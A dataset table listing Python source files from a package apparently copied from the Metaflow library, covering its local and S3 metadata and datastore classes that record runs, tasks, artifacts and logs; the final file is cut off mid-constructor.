code
stringlengths 501
5.19M
| package
stringlengths 2
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
import glob
import json
import os
import time
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from .metadata import MetadataProvider
class LocalMetadataProvider(MetadataProvider):
TYPE = 'local'
def __init__(self, environment, flow, event_logger, monitor):
super(LocalMetadataProvider, self).__init__(environment, flow, event_logger, monitor)
@classmethod
def compute_info(cls, val):
from metaflow.datastore.local import LocalDataStore
v = os.path.realpath(os.path.join(val, DATASTORE_LOCAL_DIR))
if os.path.isdir(v):
LocalDataStore.datastore_root = v
return val
raise ValueError(
'Could not find directory %s in directory %s' % (DATASTORE_LOCAL_DIR, val))
@classmethod
def default_info(cls):
from metaflow.datastore.local import LocalDataStore
def print_clean(line, **kwargs):
print(line)
v = LocalDataStore.get_datastore_root_from_config(print_clean, create_on_absent=False)
if v is None:
return '<No %s directory found in current working tree>' % DATASTORE_LOCAL_DIR
return os.path.dirname(v)
def new_run_id(self, tags=[], sys_tags=[]):
# We currently just use the timestamp to create an ID. We can be reasonably certain
# that it is unique and this makes it possible to do without coordination or
# reliance on POSIX locks in the filesystem.
run_id = '%d' % (time.time() * 1e6)
self._new_run(run_id, tags, sys_tags)
return run_id
def register_run_id(self, run_id, tags=[], sys_tags=[]):
pass
def new_task_id(self, run_id, step_name, tags=[], sys_tags=[]):
self._task_id_seq += 1
task_id = str(self._task_id_seq)
self._new_task(run_id, step_name, task_id, tags, sys_tags)
return task_id
def register_task_id(self,
run_id,
step_name,
task_id,
tags=[],
sys_tags=[]):
self._register_code_package_metadata(run_id, step_name, task_id)
def get_runtime_environment(self, runtime_name):
return {}
def register_data_artifacts(self,
run_id,
step_name,
task_id,
attempt_id,
artifacts):
meta_dir = self._create_and_get_metadir(self._flow_name, run_id, step_name, task_id)
artlist = self._artifacts_to_json(run_id, step_name, task_id, attempt_id, artifacts)
artdict = {'%d_artifact_%s' % (attempt_id, art['name']): art for art in artlist}
self._save_meta(meta_dir, artdict)
def register_metadata(self, run_id, step_name, task_id, metadata):
meta_dir = self._create_and_get_metadir(self._flow_name, run_id, step_name, task_id)
metalist = self._metadata_to_json(run_id, step_name, task_id, metadata)
ts = int(round(time.time() * 1000))
metadict = {'sysmeta_%s_%d' % (meta['field_name'], ts): meta for meta in metalist}
self._save_meta(meta_dir, metadict)
@classmethod
def _get_object_internal(cls, obj_type, obj_order, sub_type, sub_order, filters=None, *args):
from metaflow.datastore.local import LocalDataStore
if obj_type == 'artifact':
# Artifacts are actually part of the tasks in the filesystem
obj_type = 'task'
sub_type = 'artifact'
sub_order = obj_order
obj_order = obj_order - 1
# Special handling of self, artifact, and metadata
if sub_type == 'self':
meta_path = LocalMetadataProvider._get_metadir(*args[:obj_order])
if meta_path is None:
return None
self_file = os.path.join(meta_path, '_self.json')
if os.path.isfile(self_file):
return MetadataProvider._apply_filter(
[LocalMetadataProvider._read_json_file(self_file)], filters)[0]
return None
if sub_type == 'artifact':
meta_path = LocalMetadataProvider._get_metadir(*args[:obj_order])
result = []
if meta_path is None:
return result
attempt_done_files = os.path.join(meta_path, 'sysmeta_attempt-done_*')
attempts_done = sorted(glob.iglob(attempt_done_files))
if attempts_done:
successful_attempt = int(LocalMetadataProvider._read_json_file(
attempts_done[-1])['value'])
which_artifact = '*'
if len(args) >= sub_order:
which_artifact = args[sub_order - 1]
artifact_files = os.path.join(
meta_path, '%d_artifact_%s.json' % (successful_attempt, which_artifact))
for obj in glob.iglob(artifact_files):
result.append(LocalMetadataProvider._read_json_file(obj))
return result
if sub_type == 'metadata':
result = []
meta_path = LocalMetadataProvider._get_metadir(*args[:obj_order])
if meta_path is None:
return result
files = os.path.join(meta_path, 'sysmeta_*')
for obj in glob.iglob(files):
result.append(LocalMetadataProvider._read_json_file(obj))
return result
# For the other types, we locate all the objects we need to find and return them
obj_path = LocalMetadataProvider._make_path(*args[:obj_order], create_on_absent=False)
result = []
if obj_path is None:
return result
skip_dirs = '*/'*(sub_order - obj_order)
all_meta = os.path.join(obj_path, skip_dirs, LocalDataStore.METADATA_DIR)
for meta_path in glob.iglob(all_meta):
self_file = os.path.join(meta_path, '_self.json')
if os.path.isfile(self_file):
result.append(LocalMetadataProvider._read_json_file(self_file))
return MetadataProvider._apply_filter(result, filters)
@staticmethod
def _makedirs(path):
# this is for python2 compatibility.
# Python3 has os.makedirs(exist_ok=True).
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
# Error raised when directory exists
return
else:
raise
def _ensure_meta(
self, obj_type, run_id, step_name, task_id, tags=[], sys_tags=[]):
subpath = self._create_and_get_metadir(self._flow_name, run_id, step_name, task_id)
selfname = os.path.join(subpath, '_self.json')
self._makedirs(subpath)
if os.path.isfile(selfname):
return
# In this case, the metadata information does not exist so we create it
self._save_meta(
subpath,
{'_self': self._object_to_json(
obj_type,
run_id,
step_name,
task_id,
tags + self.sticky_tags, sys_tags + self.sticky_sys_tags)})
def _new_run(self, run_id, tags=[], sys_tags=[]):
self._ensure_meta('flow', None, None, None)
self._ensure_meta('run', run_id, None, None, tags, sys_tags)
def _new_task(self, run_id, step_name, task_id, tags=[], sys_tags=[]):
self._ensure_meta('step', run_id, step_name, None)
self._ensure_meta('task', run_id, step_name, task_id, tags, sys_tags)
self._register_code_package_metadata(run_id, step_name, task_id)
@staticmethod
def _make_path(
flow_name=None, run_id=None, step_name=None, task_id=None, pathspec=None,
create_on_absent=True):
from metaflow.datastore.local import LocalDataStore
if LocalDataStore.datastore_root is None:
def print_clean(line, **kwargs):
print(line)
LocalDataStore.datastore_root = LocalDataStore.get_datastore_root_from_config(
print_clean, create_on_absent=create_on_absent)
if LocalDataStore.datastore_root is None:
return None
return LocalDataStore.make_path(flow_name, run_id, step_name, task_id, pathspec)
@staticmethod
def _create_and_get_metadir(
flow_name=None, run_id=None, step_name=None, task_id=None):
from metaflow.datastore.local import LocalDataStore
root_path = LocalMetadataProvider._make_path(flow_name, run_id, step_name, task_id)
subpath = os.path.join(root_path, LocalDataStore.METADATA_DIR)
LocalMetadataProvider._makedirs(subpath)
return subpath
@staticmethod
def _get_metadir(flow_name=None, run_id=None, step_name=None, task_id=None):
from metaflow.datastore.local import LocalDataStore
root_path = LocalMetadataProvider._make_path(
flow_name, run_id, step_name, task_id, create_on_absent=False)
if root_path is None:
return None
subpath = os.path.join(root_path, LocalDataStore.METADATA_DIR)
if os.path.isdir(subpath):
return subpath
return None
@staticmethod
def _dump_json_to_file(
filepath, data, allow_overwrite=False):
if os.path.isfile(filepath) and not allow_overwrite:
return
with open(filepath + '.tmp', 'w') as f:
json.dump(data, f)
os.rename(filepath + '.tmp', filepath)
@staticmethod
def _read_json_file(filepath):
with open(filepath, 'r') as f:
return json.load(f)
@staticmethod
def _save_meta(root_dir, metadict):
for name, datum in metadict.items():
filename = os.path.join(root_dir, '%s.json' % name)
LocalMetadataProvider._dump_json_to_file(filename, datum) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/metadata/local.py | local.py |
import json
import os
import time
from collections import namedtuple
from datetime import datetime
from metaflow.exception import MetaflowInternalError
from metaflow.util import get_username, resolve_identity
DataArtifact = namedtuple('DataArtifact',
'name ds_type url type sha')
MetaDatum = namedtuple('MetaDatum',
'field value type')
class MetadataProviderMeta(type):
def __new__(metaname, classname, bases, attrs):
return type.__new__(metaname, classname, bases, attrs)
def _get_info(classobject):
if not classobject._INFO:
classobject._INFO = classobject.default_info()
return classobject._INFO
def _set_info(classobject, val):
v = classobject.compute_info(val)
classobject._INFO = v
def __init__(classobject, classname, bases, attrs):
classobject._INFO = None
INFO = property(_get_info, _set_info)
# From https://stackoverflow.com/questions/22409430/portable-meta-class-between-python2-and-python3
def with_metaclass(mcls):
def decorator(cls):
body = vars(cls).copy()
# clean out class body
body.pop('__dict__', None)
body.pop('__weakref__', None)
return mcls(cls.__name__, cls.__bases__, body)
return decorator
@with_metaclass(MetadataProviderMeta)
class MetadataProvider(object):
@classmethod
def compute_info(cls, val):
'''
Compute the new information for this provider
The computed value should be returned and will then be accessible directly as cls.INFO.
This information will be printed by the client when describing this metadata provider
Parameters
----------
val : str
Provider specific information used in computing the new information. For example, this
can be a path.
Returns
-------
str :
Value to be set to INFO
'''
return ''
@classmethod
def default_info(cls):
'''
Returns the default information for this provider
This should compute and return the default value for the information regarding this provider.
For example, this can compute where the metadata is stored
Returns
-------
str
Value to be set by default in INFO
'''
return ''
def new_run_id(self, tags=[], sys_tags=[]):
'''
Creates an ID and registers this new run.
The run ID will be unique within a given flow.
Parameters
----------
tags : list, optional
Tags to apply to this particular run, by default []
sys_tags : list, optional
System tags to apply to this particular run, by default []
Returns
-------
int
Run ID for the run
'''
raise NotImplementedError()
def register_run_id(self, run_id, tags=[], sys_tags=[]):
'''
No-op operation in this implementation.
Parameters
----------
run_id : int
Run ID for this run
tags : list, optional
Tags to apply to this particular run, by default []
sys_tags : list, optional
System tags to apply to this particular run, by default []
'''
raise NotImplementedError()
def new_task_id(self, run_id, step_name, tags=[], sys_tags=[]):
'''
Creates an ID and registers this new task.
The task ID will be unique within a flow, run and step
Parameters
----------
run_id : int
ID of the run
step_name : string
Name of the step
tags : list, optional
Tags to apply to this particular task, by default []
sys_tags : list, optional
System tags to apply to this particular task, by default []
Returns
-------
int
Task ID for the task
'''
raise NotImplementedError()
def register_task_id(self, run_id, step_name, task_id, tags=[], sys_tags=[]):
'''
No-op operation in this implementation.
Parameters
----------
run_id : int or convertible to int
Run ID for this run
step_name : string
Name of the step
task_id : int
Task ID
tags : list, optional
Tags to apply to this particular run, by default []
sys_tags : list, optional
System tags to apply to this particular run, by default []
'''
raise NotImplementedError()
def get_runtime_environment(self, runtime_name):
'''
Returns a dictionary of environment variables to be set
Parameters
----------
runtime_name : string
Name of the runtime for which to get the environment
Returns
-------
dict[string] -> string
Environment variables from this metadata provider
'''
raise NotImplementedError()
def register_data_artifacts(self,
run_id,
step_name,
task_id,
attempt_id,
artifacts):
'''
Registers the fact that the data-artifacts are associated with
the particular task.
Artifacts produced by a given task can be associated with the
task using this call
Parameters
----------
run_id : int
Run ID for the task
step_name : string
Step name for the task
task_id : int
Task ID for the task
attempt_id : int
Attempt for the task
artifacts : List of DataArtifact
Artifacts associated with this task
'''
raise NotImplementedError()
def register_metadata(self, run_id, step_name, task_id, metadata):
'''
Registers metadata with a task.
Note that the same metadata can be registered multiple times for the same task (for example
by multiple attempts). Internally, the timestamp of when the registration call is made is
also recorded allowing the user to determine the latest value of the metadata.
Parameters
----------
run_id : int
Run ID for the task
step_name : string
Step name for the task
task_id : int
Task ID for the task
metadata : List of MetaDatum
Metadata associated with this task
'''
raise NotImplementedError()
@classmethod
def _get_object_internal(cls, obj_type, obj_order, sub_type, sub_order, filters=None, *args):
'''
Return objects for the implementation of this class
See get_object_internal for the description of what this function does
Parameters
----------
obj_type : string
One of 'root', 'flow', 'run', 'step', 'task', 'artifact'
obj_order: int
Order in the last ['root', 'flow', 'run', 'step', 'task', 'artifact']
sub_type : string
Same as obj_type with the addition of 'metadata', 'self'
sub_order:
Order in the same list as the one for obj_order + ['metadata', 'self']
filters : dict
Dictionary with keys 'any_tags', 'tags' and 'system_tags'. If specified
will return only objects that have the specified tags present. Filters
are ANDed together so all tags must be present for the object to be returned.
Return
------
object or list :
Depending on the call, the type of object return varies
'''
raise NotImplementedError()
def add_sticky_tags(self, tags=[], sys_tags=[]):
'''
Adds tags to be added to every run and task
Tags can be added to record information about a run/task. Such tags can be specified on a
per run or task basis using the new_run_id/register_run_id or new_task_id/register_task_id
functions but can also be set globally using this function. Tags added here will be
added to every run/task created after this call is made.
Parameters
----------
tags : list, optional
Tags to add to every run/task, by default []
sys_tags : list, optional
System tags to add to every run/task, by default []
'''
self.sticky_tags.extend(tags)
self.sticky_sys_tags.extend(sys_tags)
@classmethod
def get_object(cls, obj_type, sub_type, filters=None, *args):
'''Returns the requested object depending on obj_type and sub_type
obj_type can be one of 'root', 'flow', 'run', 'step', 'task',
or 'artifact'
sub_type describes the aggregation required and can be either:
'metadata', 'self' or any of obj_type provided that it is slotted below
the object itself. For example, if obj_type is 'flow', you can
specify 'run' to get all the runs in that flow.
A few special rules:
- 'metadata' is only allowed for obj_type 'task'
- For obj_type 'artifact', only 'self' is allowed
A few examples:
- To get a list of all flows:
- set obj_type to 'root' and sub_type to 'flow'
- To get a list of all tasks:
- set obj_type to 'root' and sub_type to 'task'
- To get a list of all artifacts in a task:
- set obj_type to 'task' and sub_type to 'artifact'
- To get information about a specific flow:
- set obj_type to 'flow' and sub_type to 'self'
Parameters
----------
obj_type : string
One of 'root', 'flow', 'run', 'step', 'task', 'artifact' or 'metadata'
sub_type : string
Same as obj_type with the addition of 'self'
filters : dict
Dictionary with keys 'any_tags', 'tags' and 'system_tags'. If specified
will return only objects that have the specified tags present. Filters
are ANDed together so all tags must be present for the object to be returned.
Return
------
object or list :
Depending on the call, the type of object return varies
'''
obj_order = {
'root': 0,
'flow': 1,
'run': 2,
'step': 3,
'task': 4,
'artifact': 5,
'metadata': 6,
'self': 7}
type_order = obj_order.get(obj_type)
sub_order = obj_order.get(sub_type)
if type_order is None:
raise MetaflowInternalError(msg='Cannot find type %s' % obj_type)
if type_order > 5:
raise MetaflowInternalError(msg='Type %s is not allowed' % obj_type)
if sub_order is None:
raise MetaflowInternalError(msg='Cannot find subtype %s' % sub_type)
if type_order >= sub_order:
raise MetaflowInternalError(msg='Subtype %s not allowed for %s' % (sub_type, obj_type))
# Metadata is always only at the task level
if sub_type == 'metadata' and obj_type != 'task':
raise MetaflowInternalError(msg='Metadata can only be retrieved at the task level')
return cls._get_object_internal(obj_type, type_order, sub_type, sub_order, filters, *args)
def _all_obj_elements(self, tags=[], sys_tags=[]):
user = get_username()
return {
'flow_id': self._flow_name,
'user_name': user,
'tags': tags,
'system_tags': sys_tags,
'ts_epoch': int(round(time.time() * 1000))}
def _flow_to_json(self, tags=[], sys_tags=[]):
return self._all_obj_elements(tags, sys_tags)
def _run_to_json(self, run_id=None, tags=[], sys_tags=[]):
if run_id is not None:
d = {'run_number': run_id}
else:
d = {}
d.update(self._all_obj_elements(tags, sys_tags))
return d
def _step_to_json(self, run_id, step_name, tags=[], sys_tags=[]):
d = {
'run_number': run_id,
'step_name': step_name}
d.update(self._all_obj_elements(tags, sys_tags))
return d
def _task_to_json(self, run_id, step_name, task_id=None, tags=[], sys_tags=[]):
d = {
'run_number': run_id,
'step_name': step_name}
if task_id is not None:
d['task_id'] = task_id
d.update(self._all_obj_elements(tags, sys_tags))
return d
def _object_to_json(
self, obj_type, run_id=None, step_name=None, task_id=None, tags=[], sys_tags=[]):
if obj_type == 'task':
return self._task_to_json(run_id, step_name, task_id, tags, sys_tags)
if obj_type == 'step':
return self._step_to_json(run_id, step_name, tags, sys_tags)
if obj_type == 'run':
return self._run_to_json(run_id, tags, sys_tags)
return self._flow_to_json(tags, sys_tags)
def _artifacts_to_json(self, run_id, step_name, task_id, attempt_id, artifacts):
result = []
for art in artifacts:
d = {
'run_number': run_id,
'step_name': step_name,
'task_id': task_id,
'attempt_id': attempt_id,
'name': art.name,
'content_type': art.type,
'type': 'metaflow.artifact',
'sha': art.sha,
'ds_type': art.ds_type,
'location': art.url}
d.update(self._all_obj_elements(self.sticky_tags, self.sticky_sys_tags))
result.append(d)
return result
def _metadata_to_json(self, run_id, step_name, task_id, metadata):
user = get_username()
return [{
'flow_id': self._flow_name,
'run_number': run_id,
'step_name': step_name,
'task_id': task_id,
'field_name': datum.field,
'type': datum.type,
'value': datum.value,
'user_name': user,
'ts_epoch': int(round(time.time() * 1000))} for datum in metadata]
def _tags(self):
env = self._environment.get_environment_info()
tags = [
resolve_identity(),
'runtime:' + env['runtime'],
'python_version:' + env['python_version_code'],
'date:' + datetime.utcnow().strftime('%Y-%m-%d')]
if env['metaflow_version']:
tags.append('metaflow_version:' + env['metaflow_version'])
return tags
def _register_code_package_metadata(self, run_id, step_name, task_id):
metadata = []
code_sha = os.environ.get('METAFLOW_CODE_SHA')
code_url = os.environ.get('METAFLOW_CODE_URL')
code_ds = os.environ.get('METAFLOW_CODE_DS')
if code_sha:
metadata.append(MetaDatum(
field='code-package',
value=json.dumps({'ds_type': code_ds, 'sha': code_sha, 'location': code_url}),
type='code-package'))
if metadata:
self.register_metadata(run_id, step_name, task_id, metadata)
@staticmethod
def _apply_filter(elts, filters):
if filters is None:
return elts
starting_point = elts
result = []
for key, value in filters.items():
if key == 'any_tags':
for obj in starting_point:
if value in obj.get('tags', []) or value in obj.get('system_tags', []):
result.append(obj)
if key == 'tags':
for obj in starting_point:
if value in obj.get('tags', []):
result.append(obj)
if key == 'system_tags':
for obj in starting_point:
if value in obj.get('system_tags', []):
result.append(obj)
starting_point = result
result = []
return starting_point
def __init__(self, environment, flow, event_logger, monitor):
self._task_id_seq = -1
self.sticky_tags = []
self.sticky_sys_tags = []
self._flow_name = flow.name
self._event_logger = event_logger
self._monitor = monitor
self._environment = environment
self._runtime = os.environ.get(
'METAFLOW_MLI_RUNTIME_NAME', 'dev')
self.add_sticky_tags(sys_tags=self._tags()) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/metadata/metadata.py | metadata.py |
import os
import json
import gzip
from tempfile import NamedTemporaryFile
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_LOCAL
from .datastore import MetaflowDataStore, DataException, only_if_not_done
from ..metadata import MetaDatum
class LocalDataStore(MetaflowDataStore):
TYPE = 'local'
METADATA_DIR = '_meta'
def _makedirs(self, path):
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def object_path(self, sha):
root = os.path.join(self.data_root, sha[:2])
return os.path.join(root, sha)
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
# Compute path for DATASTORE_SYSROOT_LOCAL
result = DATASTORE_SYSROOT_LOCAL
if result is None:
try:
# Python2
current_path = os.getcwdu()
except: # noqa E722
current_path = os.getcwd()
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
check_dir = os.path.realpath(check_dir)
orig_path = check_dir
top_level_reached = False
while not os.path.isdir(check_dir):
new_path = os.path.dirname(current_path)
if new_path == current_path:
top_level_reached = True
break # We are no longer making upward progress
current_path = new_path
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
if top_level_reached:
if create_on_absent:
# Could not find any directory to use so create a new one
echo('Creating local datastore in current directory (%s)' % orig_path,
fg='magenta', bold=True)
os.mkdir(orig_path)
result = orig_path
else:
return None
else:
result = check_dir
else:
result = os.path.join(result, DATASTORE_LOCAL_DIR)
return result
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
run_prefix = cls.make_path(flow_name, run_id)
data_blobs = []
if os.path.exists(run_prefix):
if steps is None:
steps = [s for s in os.listdir(run_prefix) if s != cls.METADATA_DIR]
if pathspecs is None:
task_prefixes = []
for step in steps:
step_prefix = cls.make_path(flow_name, run_id, step)
for task in os.listdir(step_prefix):
if task == cls.METADATA_DIR:
continue
task_prefixes.append(
cls.make_path(flow_name, run_id, step, task))
else:
task_prefixes = [cls.make_path(flow_name, pathspec)
for pathspec in pathspecs]
for task_prefix in task_prefixes:
step, task = task_prefix.split('/')[-2:]
# Sort the file listing to iterate in increasing order of
# attempts.
latest_data_path = None
latest_attempt = None
latest_done_attempt = None
for fname in sorted(os.listdir(task_prefix)):
if cls.is_done_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_done_attempt = attempt
# Read the corresponding metadata file.
meta_fname = \
cls.get_metadata_filename_for_attempt(attempt)
latest_data_path = os.path.join(task_prefix, meta_fname)
elif cls.is_attempt_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_attempt = attempt
# Only read the metadata if the latest attempt is also done.
if latest_done_attempt is not None and\
latest_done_attempt == latest_attempt:
with open(latest_data_path) as f:
data_blobs.append((step, task, attempt, f.read()))
return data_blobs
else:
raise DataException("Couldn't find data at %s" % run_prefix)
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
artifact_list = []
for path in artifacts_to_prefetch:
sha = path.split('/')[-1]
artifact_list.append((sha,
cls.decode_gzip_data(path)))
return artifact_list
@only_if_not_done
def save_log(self, logtype, bytebuffer):
"""
Save a task-specific log file represented as a bytes object.
"""
path = self.get_log_location(logtype)
with open(path + '.tmp', 'wb') as f:
f.write(bytebuffer)
os.rename(path + '.tmp', path)
return path
def load_log(self, logtype, attempt_override=None):
"""
Load a task-specific log file represented as a bytes object.
"""
path = self.get_log_location(logtype, attempt_override)
with open(path, 'rb') as f:
return f.read()
@only_if_not_done
def save_metadata(self, name, metadata):
"""
Save a task-specific metadata dictionary as JSON.
"""
self._makedirs(self.root)
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path + '.tmp', 'w') as f:
json.dump(metadata, f)
os.rename(path + '.tmp', path)
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path) as f:
return json.load(f)
def has_metadata(self, name, with_attempt=True):
attempt = self.attempt if with_attempt else None
filename = self.filename_with_attempt_prefix('%s.json' % name, attempt)
path = os.path.join(self.root, filename)
return os.path.exists(path)
@only_if_not_done
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
path = self.object_path(sha)
if not os.path.exists(path):
self._makedirs(os.path.dirname(path))
# NOTE multiple tasks may try to save an object with the
# same sha concurrently, hence we need to use a proper tmp
# file
with NamedTemporaryFile(dir=os.path.dirname(path),
prefix='blobtmp.',
delete=False) as tmp:
# NOTE compresslevel makes a huge difference. The default
# level of 9 can be impossibly slow.
with gzip.GzipFile(fileobj=tmp,
mode='wb',
compresslevel=3) as f:
f.write(transformable_object.current())
os.rename(tmp.name, path)
return path
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
with gzip.open(self.object_path(sha), 'rb') as f:
return f.read()
@only_if_not_done
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
self._makedirs(self.root)
try:
# this is for python2 compatibility.
# Python3 has open(mode='x').
fd = os.fdopen(os.open(path,
os.O_EXCL | os.O_WRONLY | os.O_CREAT),
'wb')
fd.close()
except OSError as x:
if x.errno == 17:
raise DataException('Path %s already exists. Try with a '
'different --run-id.' % path)
else:
raise
self.metadata.register_metadata(
self.run_id, self.step_name, self.task_id,
[MetaDatum(field='attempt-done', value=str(self.attempt), type='attempt-done')])
self._is_done_set = True
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
succesfully with done().
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
return os.path.exists(path) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/datastore/local.py | local.py |
import os
import sys
import json
import gzip
try:
# python2
from urlparse import urlparse
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
from urllib.parse import urlparse
import io
BytesIO = io.BytesIO
from .datastore import MetaflowDataStore, DataException, only_if_not_done
from ..metadata import MetaDatum
from .util.s3util import aws_retry, get_s3_client
class S3DataStore(MetaflowDataStore):
TYPE='s3'
s3 = None
ClientError = None
def __init__(self, *args, **kwargs):
self.reset_client()
super(S3DataStore, self).__init__(*args, **kwargs)
@classmethod
def reset_client(cls, hard_reset=False):
# the s3 client is shared across all S3DataStores
# so we don't open N connections to S3 unnecessarily
if cls.s3 is None or hard_reset:
cls.s3, cls.ClientError = get_s3_client()
@aws_retry
def _get_s3_object(self, path, return_buf=False):
url = urlparse(path)
buf = BytesIO()
if self.monitor:
with self.monitor.measure("metaflow.s3.get_object"):
self.s3.download_fileobj(url.netloc, url.path.lstrip('/'), buf)
else:
self.s3.download_fileobj(url.netloc, url.path.lstrip('/'), buf)
if return_buf:
buf.seek(0)
return buf
else:
return buf.getvalue()
@aws_retry
def _put_s3_object(self, path, blob=None, buf=None):
url = urlparse(path)
if buf is None:
buf = BytesIO(blob)
if self.monitor:
with self.monitor.measure("metaflow.s3.put_object"):
self.s3.upload_fileobj(buf, url.netloc, url.path.lstrip('/'))
else:
self.s3.upload_fileobj(buf, url.netloc, url.path.lstrip('/'))
@aws_retry
def _head_s3_object(self, path):
url = urlparse(path)
try:
return self.s3.head_object(Bucket=url.netloc, Key=url.path.lstrip('/'))
except self.ClientError as err:
error_code = int(err.response['Error']['Code'])
if error_code == 404:
return None
else:
raise
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
run_prefix = cls.make_path(flow_name, run_id)
from metaflow import S3
with S3() as s3:
task_urls = []
# Note: When `pathspecs` is specified, we avoid the eventually
# consistent `s3.list_paths` operation, and directly construct the
# task_urls list.
if pathspecs:
task_urls = [cls.make_path(flow_name, pathspec=pathspec)
for pathspec in pathspecs]
elif steps:
task_objs = s3.list_paths(
[cls.make_path(flow_name, run_id, step) for step in steps])
task_urls = [task.url for task in task_objs]
else:
step_objs = s3.list_paths([run_prefix])
task_objs = s3.list_paths([step.url for step in step_objs])
task_urls = [task.url for task in task_objs]
urls = []
for task_url in task_urls:
for attempt in range(5):
metadata_filename = \
cls.get_metadata_filename_for_attempt(attempt)
urls.append(os.path.join(task_url, metadata_filename))
# Note for potential future optimization:
# Find the list of latest attempt for each task first, and
# follow up with a call to get done and metadata.
attempt_filename = \
cls.get_filename_for_attempt(attempt)
urls.append(os.path.join(task_url, attempt_filename))
done_filename = cls.get_done_filename_for_attempt(attempt)
urls.append(os.path.join(task_url, done_filename))
results = s3.get_many(urls, return_missing=True)
all_data_blobs = {}
latest_attempt = {}
done_attempts = set()
for result in results:
if result.exists:
path = result.url
step_name, task_id, fname = path.split('/')[-3:]
_, attempt = cls.parse_filename(fname)
if cls.is_done_filename(fname):
done_attempts.add((step_name, task_id, attempt))
elif cls.is_attempt_filename(fname):
# files are in sorted order, so overwrite is ok.
latest_attempt[(step_name, task_id)] = attempt
else:
# is_metadata_filename(fname) == True.
all_data_blobs[(step_name, task_id, attempt)] = \
result.blob
latest_attempts = set((step_name, task_id, attempt)
for (step_name, task_id), attempt
in latest_attempt.items())
latest_and_done = latest_attempts & done_attempts
return [(step_name, task_id, attempt,
all_data_blobs[(step_name, task_id, attempt)])
for step_name, task_id, attempt in latest_and_done]
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
artifact_list = []
from metaflow import S3
with S3() as s3:
for obj in s3.get_many(artifacts_to_prefetch):
sha = obj.key.split('/')[-1]
artifact_list.append((sha, cls.decode_gzip_data(obj.path)))
return artifact_list
@only_if_not_done
def save_metadata(self, name, data):
"""
Save a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
self._put_s3_object(path, json.dumps(data).encode('utf-8'))
def has_metadata(self, name, with_attempt=True):
attempt = self.attempt if with_attempt else None
filename = self.filename_with_attempt_prefix('%s.json' % name,
attempt)
path = os.path.join(self.root, filename)
return bool(self._head_s3_object(path))
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
return json.loads(self._get_s3_object(path).decode('utf-8'))
def object_path(self, sha):
root = os.path.join(self.data_root, sha[:2])
return os.path.join(root, sha)
@only_if_not_done
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
path = self.object_path(sha)
if not self._head_s3_object(path):
buf = BytesIO()
# NOTE compresslevel makes a huge difference. The default
# level of 9 can be impossibly slow.
with gzip.GzipFile(fileobj=buf,
mode='wb',
compresslevel=3) as f:
f.write(transformable_object.current())
transformable_object.transform(lambda _: buf)
buf.seek(0)
self._put_s3_object(path, buf=buf)
return path
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
path = self.object_path(sha)
buf = self._get_s3_object(path, return_buf=True)
return self.decode_gzip_data(None, buf) # filename=None
@only_if_not_done
def save_log(self, logtype, bytebuffer):
"""
Save a log file represented as a bytes object.
"""
path = self.get_log_location(logtype)
self._put_s3_object(path, bytebuffer)
return path
def load_log(self, logtype, attempt_override=None):
"""
Load a task-specific log file represented as a bytes object.
"""
path = self.get_log_location(logtype, attempt_override)
return self._get_s3_object(path)
@only_if_not_done
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
self._put_s3_object(path, b'')
self.metadata.register_metadata(
self.run_id, self.step_name, self.task_id,
[MetaDatum(field='attempt-done', value=str(self.attempt), type='attempt-done')])
self._is_done_set = True
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
succesfully with done().
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
return bool(self._head_s3_object(path)) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/datastore/s3.py | s3.py |
import json
"""
MetaflowDatastoreSet allows you to prefetch multiple (read) datastores into a
cache and lets you access them.
As a performance optimization it also lets you prefetch select data artifacts
leveraging a shared cache.
"""
class MetaflowDatastoreSet(object):
def __init__(self,
ds_class,
flow_name,
run_id,
steps=None,
pathspecs=None,
metadata=None,
event_logger=None,
monitor=None,
prefetch_data_artifacts=None):
data_blobs = ds_class.get_latest_tasks(flow_name,
run_id,
steps=steps,
pathspecs=pathspecs)
